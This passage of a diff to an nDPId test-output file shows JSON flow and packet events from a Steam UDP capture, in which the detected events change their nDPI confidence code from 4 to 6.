00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"steam.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1357332164936,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164936,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARQa3AqLyV0G+rUrJhaYkALGIgVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"steam.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164936,"flow_last_seen":1357332164936,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164936,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.171.82","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
+00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"steam.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164936,"flow_last_seen":1357332164936,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164936,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.171.82","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"steam.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164936,"flow_last_seen":1357332164936,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164936,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.185","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"steam.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1357332164936,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164936,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARNxHAqLyVSKU9ubJhaYoALFeDVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} 
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"steam.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164936,"flow_last_seen":1357332164936,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164936,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.185","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"steam.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164936,"flow_last_seen":1357332164936,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164936,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.185","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"steam.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164937,"flow_last_seen":1357332164937,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164937,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"steam.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1357332164937,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164937,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR+L7AqLyVUatzBbJhaYsALBkwVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"steam.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164937,"flow_last_seen":1357332164937,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164937,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"steam.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164937,"flow_last_seen":1357332164937,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164937,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"steam.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164937,"flow_last_seen":1357332164937,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164937,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"steam.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1357332164937,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164937,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARkx\/AqLyVkkKYDbJhaYkALLOSVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"steam.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164937,"flow_last_seen":1357332164937,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164937,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"steam.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164937,"flow_last_seen":1357332164937,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164937,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"steam.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1357332164974,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332164974,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWTAAAIAR3dhIpT25wKi8lWmKsmEANKoaVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAABVTtA7EAAAA="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"steam.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1357332164980,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332164980,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWTEAAIARxIVEjlsiwKi8lWmJsmEANIkpVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAA3X7NeAABAAA="} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"steam.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164986,"flow_last_seen":1357332164986,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164986,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"steam.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1357332164986,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164986,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARkx7AqLyVkkKYDrJhaYkALLORVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"steam.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164986,"flow_last_seen":1357332164986,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164986,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"steam.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164986,"flow_last_seen":1357332164986,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164986,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"steam.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164987,"flow_last_seen":1357332164987,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164987,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.174","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"steam.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1357332164987,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164987,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARNxzAqLyVSKU9rrJhaYkALFePVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} 
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"steam.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164987,"flow_last_seen":1357332164987,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164987,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.174","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"steam.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164987,"flow_last_seen":1357332164987,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164987,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.174","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"steam.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164987,"flow_last_seen":1357332164987,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164987,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.171","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"steam.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1357332164987,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164987,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR5qfAqLyVRRyRq7JhaYkALAcbVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"steam.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164987,"flow_last_seen":1357332164987,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164987,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.171","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"steam.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164987,"flow_last_seen":1357332164987,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164987,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.171","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"steam.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164987,"flow_last_seen":1357332164987,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164987,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.85","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"steam.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1357332164987,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164987,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARZ6rAqLyV0G+FVbJhaYoALIgcVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"steam.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164987,"flow_last_seen":1357332164987,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164987,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.85","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
+00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"steam.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164987,"flow_last_seen":1357332164987,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164987,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.85","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"steam.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1357332165015,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165015,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWTIAAIAROeSSQpgOwKi8lWmLsmEANBm8VlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAc5jYKUQBAAA="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"steam.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1357332165017,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165017,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWTMAAIAR6HHQb6tSwKi8lWmJsmEANJoiVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAA03wFcOUAAAA="} 
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"steam.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1357332165020,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165020,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWTQAAIARjWtFHJGrwKi8lWmJsmEANNwtVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAk2i\/c84AAAA="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"steam.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1357332165027,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165027,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWTUAAIAR3d5IpT2uwKi8lWmJsmEANL5BVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAyxQbKKkAAAA="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"steam.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165037,"flow_last_seen":1357332165037,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165037,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"steam.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1357332165037,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165037,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR+L7AqLyVUatzBbJhaYoALBkxVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"steam.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165037,"flow_last_seen":1357332165037,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165037,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"steam.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165037,"flow_last_seen":1357332165037,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165037,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"steam.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165037,"flow_last_seen":1357332165037,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165037,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.175","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"steam.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1357332165037,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165037,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARNxvAqLyVSKU9r7JhaYkALFeOVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"steam.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165037,"flow_last_seen":1357332165037,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165037,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.175","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"steam.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165037,"flow_last_seen":1357332165037,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165037,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.175","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"steam.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165037,"flow_last_seen":1357332165037,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165037,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"203.77.185.5","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 